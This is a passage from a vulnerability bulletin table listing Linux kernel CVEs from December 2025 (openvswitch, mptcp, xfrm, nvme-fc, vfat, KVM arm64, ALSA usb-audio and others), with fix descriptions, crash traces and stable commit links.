genl_family_rcv_msg+0x14b/0x220 genl_rcv_msg+0x47/0xa0 netlink_rcv_skb+0x53/0x100 genl_rcv+0x24/0x40 netlink_unicast+0x280/0x3b0 netlink_sendmsg+0x1f7/0x430 ____sys_sendmsg+0x36b/0x3a0 ___sys_sendmsg+0x87/0xd0 __sys_sendmsg+0x6d/0xd0 do_syscall_64+0x7b/0x2c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e The third issue with this process is that while trying to convert the non-masked set into masked one, validate_set() copies and doubles the size of the OVS_KEY_ATTR_NSH as if it didn't have any nested attributes. It should be copying each nested attribute and doubling them in size independently. And the process must be properly reversed during the conversion back from masked to a non-masked variant during the flow dump. In the end, the only two outcomes of trying to use this action are either validation failure or a kernel crash. And if somehow someone manages to install a flow with such an action, it will most definitely not do what it is supposed to, since all the keys and the masks are mixed up. Fixing all the issues is a complex task as it requires re-writing most of the validation code. Given that and the fact that this functionality never worked since introduction, let's just remove it altogether. It's better to re-introduce it later with a proper implementation instead of trying to fix it in stable releases. | 2025-12-04 | not yet calculated | CVE-2025-40254 | https://git.kernel.org/stable/c/3415faa1fcb4150f29a72c5ecf959339d797feb7 https://git.kernel.org/stable/c/3d2e7d3b28469081ccf08301df07cc411a1cc5e9 https://git.kernel.org/stable/c/f95bef5ba0b88d971b02c776f24bd17544930a3a https://git.kernel.org/stable/c/87d2429381ddcf8cbd30c8c36793a4f7916d5f99 https://git.kernel.org/stable/c/0b903f33c31c82b1c3591279fd8a23893802b987 https://git.kernel.org/stable/c/9c61d8fe1350b7322f4953318165d6719c3b1475 https://git.kernel.org/stable/c/4689ba45296dbb3a47e70a1bc2ed0328263e48f3 https://git.kernel.org/stable/c/dfe28c4167a9259fc0c372d9f9473e1ac95cff67 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: core: prevent NULL deref in generic_hwtstamp_ioctl_lower() The ethtool tsconfig Netlink path can trigger a null pointer dereference. A call chain such as: tsconfig_prepare_data() -> dev_get_hwtstamp_phylib() -> vlan_hwtstamp_get() -> generic_hwtstamp_get_lower() -> generic_hwtstamp_ioctl_lower() results in generic_hwtstamp_ioctl_lower() being called with kernel_cfg->ifr as NULL. The generic_hwtstamp_ioctl_lower() function does not expect a NULL ifr and dereferences it, leading to a system crash. Fix this by adding a NULL check for kernel_cfg->ifr in generic_hwtstamp_ioctl_lower(). If ifr is NULL, return -EINVAL. | 2025-12-04 | not yet calculated | CVE-2025-40255 | https://git.kernel.org/stable/c/8817f816ae41908e9625c0770c4af0dcdcc01238 https://git.kernel.org/stable/c/f796a8dec9beafcc0f6f0d3478ed685a15c5e062 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: also call xfrm_state_delete_tunnel at destroy time for states that were never added In commit b441cf3f8c4b ("xfrm: delete x->tunnel as we delete x"), I missed the case where state creation fails between full initialization (->init_state has been called) and being inserted on the lists. In this situation, ->init_state has been called, so for IPcomp tunnels, the fallback tunnel has been created and added onto the lists, but the user state never gets added, because we fail before that. The user state doesn't go through __xfrm_state_delete, so we don't call xfrm_state_delete_tunnel for those states, and we end up leaking the FB tunnel. There are several codepaths affected by this: the add/update paths, in both net/key and xfrm, and the migrate code (xfrm_migrate, xfrm_state_migrate). A "proper" rollback of the init_state work would probably be doable in the add/update code, but for migrate it gets more complicated as multiple states may be involved. At some point, the new (not-inserted) state will be destroyed, so call xfrm_state_delete_tunnel during xfrm_state_gc_destroy. Most states will have their fallback tunnel cleaned up during __xfrm_state_delete, which solves the issue that b441cf3f8c4b (and other patches before it) aimed at. All states (including FB tunnels) will be removed from the lists once xfrm_state_fini has called flush_work(&xfrm_state_gc_work). | 2025-12-04 | not yet calculated | CVE-2025-40256 | https://git.kernel.org/stable/c/d6fe5c740c573af10943b8353992e1325cdb2715 https://git.kernel.org/stable/c/10deb69864840ccf96b00ac2ab3a2055c0c04721 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix a race in mptcp_pm_del_add_timer() mptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, &entry->add_timer) while another might have free entry already, as reported by syzbot. Add RCU protection to fix this issue. Also change confusing add_timer variable with stop_timer boolean. syzbot report: BUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616 Read of size 4 at addr ffff8880311e4150 by task kworker/1:1/44 CPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)} Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Workqueue: events mptcp_worker Call Trace: <TASK> dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616 sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631 mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362 mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174 tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361 tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441 tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931 tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374 ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239 NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318 NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318 __netif_receive_skb_one_core net/core/dev.c:6079 [inline] __netif_receive_skb+0x143/0x380 net/core/dev.c:6192 process_backlog+0x31e/0x900 net/core/dev.c:6544 __napi_poll+0xb6/0x540 net/core/dev.c:7594 napi_poll net/core/dev.c:7657 [inline] net_rx_action+0x5f7/0xda0 net/core/dev.c:7784 handle_softirqs+0x22f/0x710 kernel/softirq.c:622 __do_softirq kernel/softirq.c:656 [inline] __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302 mptcp_pm_send_ack net/mptcp/pm.c:210 [inline] mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1 mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002 mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762 process_one_work kernel/workqueue.c:3263 [inline] process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 </TASK> Allocated by task 44: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:400 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417 kasan_kmalloc include/linux/kasan.h:262 [inline] __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748 kmalloc_noprof include/linux/slab.h:957 [inline] mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385 mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355 mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline] __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529 mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008 mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762 process_one_work kernel/workqueue.c:3263 [inline] process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 Freed by task 6630: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587 kasan_save_free_info mm/kasan/kasan.h:406 [inline] poison_slab_object m ---truncated--- | 2025-12-04 | not yet calculated | CVE-2025-40257 | https://git.kernel.org/stable/c/9be29f8e7ce4e147e56caac2c3a0ce3573cf9c17 https://git.kernel.org/stable/c/e2d1ad207174a7cd7903dd27a00db4b2dfa6c64b https://git.kernel.org/stable/c/385ddc0f008f24d1e7d03be998b3a98a37bd29ff https://git.kernel.org/stable/c/c602cc344b4b8d41515fec3ffa98457ac963ee12 https://git.kernel.org/stable/c/6d3275d4ca62e2c02e1b7e8cd32db59df91c14b7 https://git.kernel.org/stable/c/bbbd75346c8e6490b19c2ba90f38ea66ccf352b2 https://git.kernel.org/stable/c/426358d9be7ce3518966422f87b96f1bad27295f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix race condition in mptcp_schedule_work() syzbot reported use-after-free in mptcp_schedule_work() [1] Issue here is that mptcp_schedule_work() schedules a work, then gets a refcount on sk->sk_refcnt if the work was scheduled. This refcount will be released by mptcp_worker(). [A] if (schedule_work(...)) { [B] sock_hold(sk); return true; } Problem is that mptcp_worker() can run immediately and complete before [B] We need instead : sock_hold(sk); if (schedule_work(...)) return true; sock_put(sk); [1] refcount_t: addition on 0; use-after-free. WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25 Call Trace: <TASK> __refcount_add include/linux/refcount.h:-1 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] sock_hold include/net/sock.h:816 [inline] mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943 mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316 call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747 expire_timers kernel/time/timer.c:1798 [inline] __run_timers kernel/time/timer.c:2372 [inline] __run_timer_base+0x648/0x970 kernel/time/timer.c:2384 run_timer_base kernel/time/timer.c:2393 [inline] run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403 handle_softirqs+0x22f/0x710 kernel/softirq.c:622 __do_softirq kernel/softirq.c:656 [inline] run_ktimerd+0xcf/0x190 kernel/softirq.c:1138 smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 | 2025-12-04 | not yet calculated | CVE-2025-40258 | https://git.kernel.org/stable/c/f865e6595acf33083168db76921e66ace8bf0e5b https://git.kernel.org/stable/c/99908e2d601236842d705d5fd04fb349577316f5 https://git.kernel.org/stable/c/db4f7968a75250ca6c4ed70d0a78beabb2dcee18 https://git.kernel.org/stable/c/8f9ba1a99a89feef9b5867c15a0141a97e893309 https://git.kernel.org/stable/c/ac28dfddedf6f209190950fc71bcff65ec4ab47b https://git.kernel.org/stable/c/3fc7723ed01d1130d4bf7063c50e0af60ecccbb4 https://git.kernel.org/stable/c/035bca3f017ee9dea3a5a756e77a6f7138cc6eea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: sg: Do not sleep in atomic context sg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may sleep. Hence, call sg_finish_rem_req() with interrupts enabled instead of disabled. | 2025-12-04 | not yet calculated | CVE-2025-40259 | https://git.kernel.org/stable/c/11eeee00c94d770d4e45364060b5f1526dfe567b https://git.kernel.org/stable/c/db6ac8703ab2b473e1ec845f57f6dd961a388d9f https://git.kernel.org/stable/c/109afbd88ecc46b6cc7551367222387e97999765 https://git.kernel.org/stable/c/3dfd520c3b4ffe69e0630c580717d40447ab842f https://git.kernel.org/stable/c/b343cee5df7e750d9033fba33e96fc4399fa88a5 https://git.kernel.org/stable/c/b2c0340cfa25c5c1f65e8590cc1a2dc97d14ef0f https://git.kernel.org/stable/c/6983d8375c040bb449d2187f4a57a20de01244fe https://git.kernel.org/stable/c/90449f2d1e1f020835cba5417234636937dd657e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Fix scx_enable() crash on helper kthread creation failure A crash was observed when the sched_ext selftests runner was terminated with Ctrl+\ while test 15 was running: NIP [c00000000028fa58] scx_enable.constprop.0+0x358/0x12b0 LR [c00000000028fa2c] scx_enable.constprop.0+0x32c/0x12b0 Call Trace: scx_enable.constprop.0+0x32c/0x12b0 (unreliable) bpf_struct_ops_link_create+0x18c/0x22c __sys_bpf+0x23f8/0x3044 sys_bpf+0x2c/0x6c system_call_exception+0x124/0x320 system_call_vectored_common+0x15c/0x2ec kthread_run_worker() returns an ERR_PTR() on failure rather than NULL, but the current code in scx_alloc_and_add_sched() only checks for a NULL helper. Incase of failure on SIGQUIT, the error is not handled in scx_alloc_and_add_sched() and scx_enable() ends up dereferencing an error pointer. Error handling is fixed in scx_alloc_and_add_sched() to propagate PTR_ERR() into ret, so that scx_enable() jumps to the existing error path, avoiding random dereference on failure. | 2025-12-04 | not yet calculated | CVE-2025-40260 | https://git.kernel.org/stable/c/625e173e2a59b6cf6cbfb51c0a6bea47f3861eab https://git.kernel.org/stable/c/7b6216baae751369195fa3c83d434d23bcda406a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() nvme_fc_delete_assocation() waits for pending I/O to complete before returning, and an error can cause ->ioerr_work to be queued after cancel_work_sync() had been called. Move the call to cancel_work_sync() to be after nvme_fc_delete_association() to ensure ->ioerr_work is not running when the nvme_fc_ctrl object is freed. Otherwise the following can occur: [ 1135.911754] list_del corruption, ff2d24c8093f31f8->next is NULL [ 1135.917705] ------------[ cut here ]------------ [ 1135.922336] kernel BUG at lib/list_debug.c:52! [ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI [ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary) [ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025 [ 1135.950969] Workqueue: 0x0 (nvme-wq) [ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f [ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff <0f> 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b [ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046 [ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000 [ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0 [ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08 [ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100 [ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0 [ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000 [ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0 [ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 [ 1136.055910] PKRU: 55555554 [ 1136.058623] Call Trace: [ 1136.061074] <TASK> [ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.071898] ? move_linked_works+0x4a/0xa0 [ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.081744] ? __die_body.cold+0x8/0x12 [ 1136.085584] ? die+0x2e/0x50 [ 1136.088469] ? do_trap+0xca/0x110 [ 1136.091789] ? do_error_trap+0x65/0x80 [ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.101289] ? exc_invalid_op+0x50/0x70 [ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20 [ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.120806] move_linked_works+0x4a/0xa0 [ 1136.124733] worker_thread+0x216/0x3a0 [ 1136.128485] ? __pfx_worker_thread+0x10/0x10 [ 1136.132758] kthread+0xfa/0x240 [ 1136.135904] ? __pfx_kthread+0x10/0x10 [ 1136.139657] ret_from_fork+0x31/0x50 [ 1136.143236] ? __pfx_kthread+0x10/0x10 [ 1136.146988] ret_from_fork_asm+0x1a/0x30 [ 1136.150915] </TASK> | 2025-12-04 | not yet calculated | CVE-2025-40261 | https://git.kernel.org/stable/c/3d78e8e01251da032a5f7cbc9728e4ab1a5a5464 https://git.kernel.org/stable/c/60ba31330faf5677e2eebef7eac62ea9e42a200d https://git.kernel.org/stable/c/3d81beae4753db3b3dc5b70dc300d4036e0d9cb8 https://git.kernel.org/stable/c/33f64600a12055219bda38b55320c62cdeda9167 https://git.kernel.org/stable/c/48ae433c6cc6985f647b1b37d8bb002972cf9bdb https://git.kernel.org/stable/c/fbd5741a556eaaa63d0908132ca79d335b58b1cd https://git.kernel.org/stable/c/0a2c5495b6d1ecb0fa18ef6631450f391a888256 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: imx_sc_key - fix memory corruption on unload This is supposed to be "priv" but we accidentally pass "&priv" which is an address in the stack and so it will lead to memory corruption when the imx_sc_key_action() function is called. Remove the &. | 2025-12-04 | not yet calculated | CVE-2025-40262 | https://git.kernel.org/stable/c/3e96803b169dc948847f0fc2bae729a80914eb7b https://git.kernel.org/stable/c/4ce5218b101205b3425099fe3df88a61b58f9cc2 https://git.kernel.org/stable/c/a155292c3ce722036014da5477ee0e4c87b5e6b3 https://git.kernel.org/stable/c/ca9a08de9b294422376f47ade323d69590dbc6f2 https://git.kernel.org/stable/c/56881294915a6e866d31a46f9bcb5e19167cfbaa https://git.kernel.org/stable/c/6524a15d33951b18ac408ebbcb9c16e14e21c336 https://git.kernel.org/stable/c/d83f1512758f4ef6fc5e83219fe7eeeb6b428ea4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: cros_ec_keyb - fix an invalid memory access If cros_ec_keyb_register_matrix() isn't called (due to `buttons_switches_only`) in cros_ec_keyb_probe(), `ckdev->idev` remains NULL. An invalid memory access is observed in cros_ec_keyb_process() when receiving an EC_MKBP_EVENT_KEY_MATRIX event in cros_ec_keyb_work() in such case. Unable to handle kernel read from unreadable memory at virtual address 0000000000000028 ... x3 : 0000000000000000 x2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000 Call trace: input_event cros_ec_keyb_work blocking_notifier_call_chain ec_irq_thread It's still unknown about why the kernel receives such malformed event, in any cases, the kernel shouldn't access `ckdev->idev` and friends if the driver doesn't intend to initialize them. | 2025-12-04 | not yet calculated | CVE-2025-40263 | https://git.kernel.org/stable/c/7bfd959187f2c7584bb43280bbc7b2846e7a5085 https://git.kernel.org/stable/c/8b5ae1521660c16fa830ff17d16e650b4905b71a https://git.kernel.org/stable/c/729d21c82c1b0504ffccb17cc261bf32e024fd0f https://git.kernel.org/stable/c/d74864291cb8bd784d44d1d02e87109cf88666bb https://git.kernel.org/stable/c/9cf59f4724a9ee06ebb06c76b8678ac322e850b7 https://git.kernel.org/stable/c/6d81068685154535af06163eb585d6d9663ec7ec https://git.kernel.org/stable/c/2d251c15c27e2dd16d6318425d2f7260cbd47d39 https://git.kernel.org/stable/c/e08969c4d65ac31297fcb4d31d4808c789152f68 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: be2net: pass wrb_params in case of OS2BMC be_insert_vlan_in_pkt() is called with the wrb_params argument being NULL at be_send_pkt_to_bmc() call site. This may lead to dereferencing a NULL pointer when processing a workaround for specific packet, as commit bc0c3405abbb ("be2net: fix a Tx stall bug caused by a specific ipv6 packet") states. The correct way would be to pass the wrb_params from be_xmit(). | 2025-12-04 | not yet calculated | CVE-2025-40264 | https://git.kernel.org/stable/c/48d59b60dd5d7e4c48c077a2008c9dcd7b59bdfe https://git.kernel.org/stable/c/f499dfa5c98e92e72dd454eb95a1000a448f3405 https://git.kernel.org/stable/c/630360c6724e27f1aa494ba3fffe1e38c4205284 https://git.kernel.org/stable/c/012ee5882b1830db469194466a210768ed207388 https://git.kernel.org/stable/c/ce0a3699244aca3acb659f143c9cb1327b210f89 https://git.kernel.org/stable/c/1ecd86ec6efddb59a10c927e8e679f183bb9113e https://git.kernel.org/stable/c/4c4741f6e7f2fa4e1486cb61e1c15b9236ec134d https://git.kernel.org/stable/c/7d277a7a58578dd62fd546ddaef459ec24ccae36 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vfat: fix missing sb_min_blocksize() return value checks When emulating an nvme device on qemu with both logical_block_size and physical_block_size set to 8 KiB, but without format, a kernel panic was triggered during the early boot stage while attempting to mount a vfat filesystem. [95553.682035] EXT4-fs (nvme0n1): unable to set blocksize [95553.684326] EXT4-fs (nvme0n1): unable to set blocksize [95553.686501] EXT4-fs (nvme0n1): unable to set blocksize [95553.696448] ISOFS: unsupported/invalid hardware sector size 8192 [95553.697117] ------------[ cut here ]------------ [95553.697567] kernel BUG at fs/buffer.c:1582! [95553.697984] Oops: invalid opcode: 0000 [#1] SMP NOPTI [95553.698602] CPU: 0 UID: 0 PID: 7212 Comm: mount Kdump: loaded Not tainted 6.18.0-rc2+ #38 PREEMPT(voluntary) [95553.699511] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [95553.700534] RIP: 0010:folio_alloc_buffers+0x1bb/0x1c0 [95553.701018] Code: 48 8b 15 e8 93 18 02 65 48 89 35 e0 93 18 02 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d 31 d2 31 c9 31 f6 31 ff c3 cc cc cc cc <0f> 0b 90 66 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f [95553.702648] RSP: 0018:ffffd1b0c676f990 EFLAGS: 00010246 [95553.703132] RAX: ffff8cfc4176d820 RBX: 0000000000508c48 RCX: 0000000000000001 [95553.703805] RDX: 0000000000002000 RSI: 0000000000000000 RDI: 0000000000000000 [95553.704481] RBP: ffffd1b0c676f9c8 R08: 0000000000000000 R09: 0000000000000000 [95553.705148] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000001 [95553.705816] R13: 0000000000002000 R14: fffff8bc8257e800 R15: 0000000000000000 [95553.706483] FS: 000072ee77315840(0000) GS:ffff8cfdd2c8d000(0000) knlGS:0000000000000000 [95553.707248] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [95553.707782] CR2: 00007d8f2a9e5a20 CR3: 0000000039d0c006 CR4: 0000000000772ef0 [95553.708439] PKRU: 55555554 [95553.708734] Call Trace: [95553.709015] <TASK> [95553.709266] __getblk_slow+0xd2/0x230 [95553.709641] ? find_get_block_common+0x8b/0x530 [95553.710084] bdev_getblk+0x77/0xa0 [95553.710449] __bread_gfp+0x22/0x140 [95553.710810] fat_fill_super+0x23a/0xfc0 [95553.711216] ? __pfx_setup+0x10/0x10 [95553.711580] ? __pfx_vfat_fill_super+0x10/0x10 [95553.712014] vfat_fill_super+0x15/0x30 [95553.712401] get_tree_bdev_flags+0x141/0x1e0 [95553.712817] get_tree_bdev+0x10/0x20 [95553.713177] vfat_get_tree+0x15/0x20 [95553.713550] vfs_get_tree+0x2a/0x100 [95553.713910] vfs_cmd_create+0x62/0xf0 [95553.714273] __do_sys_fsconfig+0x4e7/0x660 [95553.714669] __x64_sys_fsconfig+0x20/0x40 [95553.715062] x64_sys_call+0x21ee/0x26a0 [95553.715453] do_syscall_64+0x80/0x670 [95553.715816] ? __fs_parse+0x65/0x1e0 [95553.716172] ? fat_parse_param+0x103/0x4b0 [95553.716587] ? vfs_parse_fs_param_source+0x21/0xa0 [95553.717034] ? __do_sys_fsconfig+0x3d9/0x660 [95553.717548] ? __x64_sys_fsconfig+0x20/0x40 [95553.717957] ? x64_sys_call+0x21ee/0x26a0 [95553.718360] ? do_syscall_64+0xb8/0x670 [95553.718734] ? __x64_sys_fsconfig+0x20/0x40 [95553.719141] ? x64_sys_call+0x21ee/0x26a0 [95553.719545] ? do_syscall_64+0xb8/0x670 [95553.719922] ? x64_sys_call+0x1405/0x26a0 [95553.720317] ? do_syscall_64+0xb8/0x670 [95553.720702] ? __x64_sys_close+0x3e/0x90 [95553.721080] ? x64_sys_call+0x1b5e/0x26a0 [95553.721478] ? do_syscall_64+0xb8/0x670 [95553.721841] ? irqentry_exit+0x43/0x50 [95553.722211] ? exc_page_fault+0x90/0x1b0 [95553.722681] entry_SYSCALL_64_after_hwframe+0x76/0x7e [95553.723166] RIP: 0033:0x72ee774f3afe [95553.723562] Code: 73 01 c3 48 8b 0d 0a 33 0f 00 f7 d8 64 89 01 48 83 c8 ff c3 0f 1f 84 00 00 00 00 00 f3 0f 1e fa 49 89 ca b8 af 01 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d da 32 0f 00 f7 d8 64 89 01 48 [95553.725188] RSP: 002b:00007ffe97148978 EFLAGS: 00000246 ORIG_RAX: 00000000000001af [95553.725892] RAX: ffffffffffffffda RBX: ---truncated--- | 2025-12-04 | not yet calculated | CVE-2025-40265 | https://git.kernel.org/stable/c/ee767b99b0045be286cceb8265bd4c9831be671e https://git.kernel.org/stable/c/63b5aa01da0f38cdbd97d021477258e511631497 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Check the untrusted offset in FF-A memory share Verify the offset to prevent OOB access in the hypervisor FF-A buffer in case an untrusted large enough value [U32_MAX - sizeof(struct ffa_composite_mem_region) + 1, U32_MAX] is set from the host kernel. | 2025-12-04 | not yet calculated | CVE-2025-40266 | https://git.kernel.org/stable/c/fc3139d9f4c1fe1c7d5f25f99676bd8e9c6a1041 https://git.kernel.org/stable/c/bc1909ef38788f2ee3d8011d70bf029948433051 https://git.kernel.org/stable/c/f9f1aed6c8a3427900da3121e1868124854569c3 https://git.kernel.org/stable/c/103e17aac09cdd358133f9e00998b75d6c1f1518 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/rw: ensure allocated iovec gets cleared for early failure A previous commit reused the recyling infrastructure for early cleanup, but this is not enough for the case where our internal caches have overflowed. If this happens, then the allocated iovec can get leaked if the request is also aborted early. Reinstate the previous forced free of the iovec for that situation. | 2025-12-06 | not yet calculated | CVE-2025-40267 | https://git.kernel.org/stable/c/094c6467fe05e0de618c5a7fcff4d3ee20aeaef8 https://git.kernel.org/stable/c/d3c9c213c0b86ac5dd8fe2c53c24db20f1f510bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: client: fix memory leak in smb3_fs_context_parse_param The user calls fsconfig twice, but when the program exits, free() only frees ctx->source for the second fsconfig, not the first. Regarding fc->source, there is no code in the fs context related to its memory reclamation. To fix this memory leak, release the source memory corresponding to ctx or fc before each parsing. syzbot reported: BUG: memory leak unreferenced object 0xffff888128afa360 (size 96): backtrace (crc 79c9c7ba): kstrdup+0x3c/0x80 mm/util.c:84 smb3_fs_context_parse_param+0x229b/0x36c0 fs/smb/client/fs_context.c:1444 BUG: memory leak unreferenced object 0xffff888112c7d900 (size 96): backtrace (crc 79c9c7ba): smb3_fs_context_fullpath+0x70/0x1b0 fs/smb/client/fs_context.c:629 smb3_fs_context_parse_param+0x2266/0x36c0 fs/smb/client/fs_context.c:1438 | 2025-12-06 | not yet calculated | CVE-2025-40268 | https://git.kernel.org/stable/c/868fc62811d3fabcf5685e14f36377a855d5412d https://git.kernel.org/stable/c/48c17341577e25a22feb13d694374b61d974edbc https://git.kernel.org/stable/c/4515743cc7a42e1d67468402a6420c195532a6fa https://git.kernel.org/stable/c/e8c73eb7db0a498cd4b22d2819e6ab1a6f506bd6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Fix potential overflow of PCM transfer buffer The PCM stream data in USB-audio driver is transferred over USB URB packet buffers, and each packet size is determined dynamically. The packet sizes are limited by some factors such as wMaxPacketSize USB descriptor. OTOH, in the current code, the actually used packet sizes are determined only by the rate and the PPS, which may be bigger than the size limit above. This results in a buffer overflow, as reported by syzbot. Basically when the limit is smaller than the calculated packet size, it implies that something is wrong, most likely a weird USB descriptor. So the best option would be just to return an error at the parameter setup time before doing any further operations. This patch introduces such a sanity check, and returns -EINVAL when the packet size is greater than maxpacksize. The comparison with ep->packsize[1] alone should suffice since it's always equal or greater than ep->packsize[0]. | 2025-12-06 | not yet calculated | CVE-2025-40269 | https://git.kernel.org/stable/c/6a5da3fa80affc948923f20a4e086177f505e86e https://git.kernel.org/stable/c/217d47255a2ec8b246f2725f5db9ac3f1d4109d7 https://git.kernel.org/stable/c/ef592bf2232a2daa9fffa8881881fc9957ea56e9 